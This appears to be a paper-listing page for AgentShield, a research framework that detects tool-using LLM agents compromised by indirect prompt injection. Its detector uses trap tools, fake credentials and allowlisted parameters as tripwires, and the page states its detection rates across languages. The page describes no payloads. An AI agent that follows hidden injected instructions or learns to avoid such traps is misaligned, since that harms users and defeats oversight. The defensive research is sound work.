AgentShield: Deception-based Compromise Detection for Tool-using LLM Agents
Yassin H. Rassul, Tarik A. Rashid

TL;DR
AgentShield is a deception-based detection framework that effectively identifies and labels compromised tool-using LLM agents across multiple languages and models, addressing gaps in existing defenses.
Contribution
It introduces a multi-layer trap system for real-time compromise detection and a self-supervised classifier that transfers across models and languages without manual labeling.
Findings
Catches 90.7%-100% of successful IPI attacks on commercial LLMs.
Zero false alarms on 485 normal-use tests.
Survives adaptive attacks with zero evasion on commercial models.
Abstract
Defenses against indirect prompt injection (IPI) in tool-using LLM agents share two structural weaknesses. First, they all attempt to prevent attacks rather than detect the compromises that slip through. Second, they have only been evaluated in English, leaving users of low-resource languages such as Kurdish and Arabic without tested protection. This paper addresses both gaps with AgentShield, a deception-based detection framework that places three layers of traps inside the agent's tool interface: fake tools, fake credentials, and allowlisted parameters. The same trap triggers serve as high-precision labels for a self-supervised classifier. An LLM agent that follows an attacker's hidden instruction almost always touches one of these traps, which gives both a real-time compromise signal and a zero-FP label for training a downstream detector without manual annotation. Across 176…
Peer Reviews
No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.
Videos
No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.
